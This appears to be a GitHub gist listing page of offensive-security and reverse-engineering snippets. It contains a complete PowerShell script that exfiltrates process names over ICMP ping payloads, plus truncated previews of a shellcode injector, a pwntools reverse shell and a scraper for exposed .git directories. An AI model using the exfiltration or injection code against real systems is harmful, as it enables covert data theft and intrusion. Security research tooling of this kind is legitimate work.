Frank Spierings FrankSpierings
@FrankSpierings
FrankSpierings / IcmpExfiltrate.ps1
Last active May 4, 2019 15:09
Powershell - Exfiltrate data through ICMP
$dst = "127.0.0.1";
$data = Get-Process | Select-Object -ExpandProperty Name | Out-String ;
$data = [System.Text.Encoding]::Ascii.GetBytes($data);
$options = New-Object System.Net.NetworkInformation.PingOptions(64, $true);
$blocksize = 1400;
for($i=0; $i -lt $data.Length; $i+=$blocksize) {
    $block = $data[$i..($i + $blocksize - 1)];
    (New-Object System.Net.NetworkInformation.Ping).Send($dst, 10, $block, $options);
}
@FrankSpierings
FrankSpierings / Inject.cs
Last active May 13, 2019 19:36
Inject shellcode into process on Windows
/*
Compile:
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe inject.cs
*/
using System;
using System.Runtime.InteropServices;
using System.Diagnostics;
using System.Net;
@FrankSpierings
FrankSpierings / reverse_shell_pwntools.py
Last active March 30, 2019 12:58
Reverse shell in pwntools
from pwn import *
# context(arch='x86_64')
context(arch='i386')
host = 'localhost'
port = 4444
if context.arch == 'i386':
sock = 'edx'
@FrankSpierings
FrankSpierings / sign.sh
Created March 28, 2019 18:00
Sign APK
#!/bin/sh
KEYSTORE=my.keystore
KEYSTORE_ALIAS=myalias
PASSWORD=password
APK=some.apk
if [ ! -f ${KEYSTORE} ]; then
keytool -noprompt -genkey -v -keystore ${KEYSTORE} -alias ${KEYSTORE_ALIAS} -keyalg RSA -keysize 2048 -validity 1000 -dname "CN=frank" -storepass ${PASSWORD} -keypass ${PASSWORD}
fi
@FrankSpierings
FrankSpierings / solve.py
Last active March 24, 2019 16:48
Simple Angr solver of 1 function
import angr
import claripy
proj = angr.Project('./test', main_opts={'custom_base_addr': 0x00100000})
arg1 = claripy.BVS('arg1', 8)
state = proj.factory.call_state(proj.loader.find_symbol('check').rebased_addr, arg1)
sm = proj.factory.simgr(state)
sm.explore(find=lambda s: b"You win" in s.posix.dumps(1))
@FrankSpierings
FrankSpierings / frida.py
Created March 24, 2019 13:05
Ghidra Plugin - Generate Frida Hooks - Requires Oneshot Decompiler Parameter ID
#TODO write a description for this script
#@author
#@category _NEW_
#@keybinding
#@menupath
#@toolbar
#TODO Add User Code Here
def getFunctions():
@FrankSpierings
FrankSpierings / git-web-puller.py
Last active March 14, 2019 13:49
Grab git files from a web application.
import requests
import tempfile
import os
import logging
import shutil
import subprocess
import re
try:
log
@FrankSpierings
FrankSpierings / crewl.py
Created February 5, 2019 12:27
CeWL alternative in Python, based on Scrapy Framework.
# -*- coding: utf-8 -*-
import scrapy
import argparse
import re
from scrapy import signals
from scrapy.spiders import CrawlSpider, Rule
from scrapy.linkextractors import LinkExtractor
from scrapy.crawler import CrawlerProcess
@FrankSpierings
FrankSpierings / yaai.html
Last active January 29, 2019 20:22
Very Important Work! A reimplementation in HTML5
<html>
<head>
<style>
#container {
font-size: 50px;
color: white;
width: 400px;
height: 260px;
}
#content {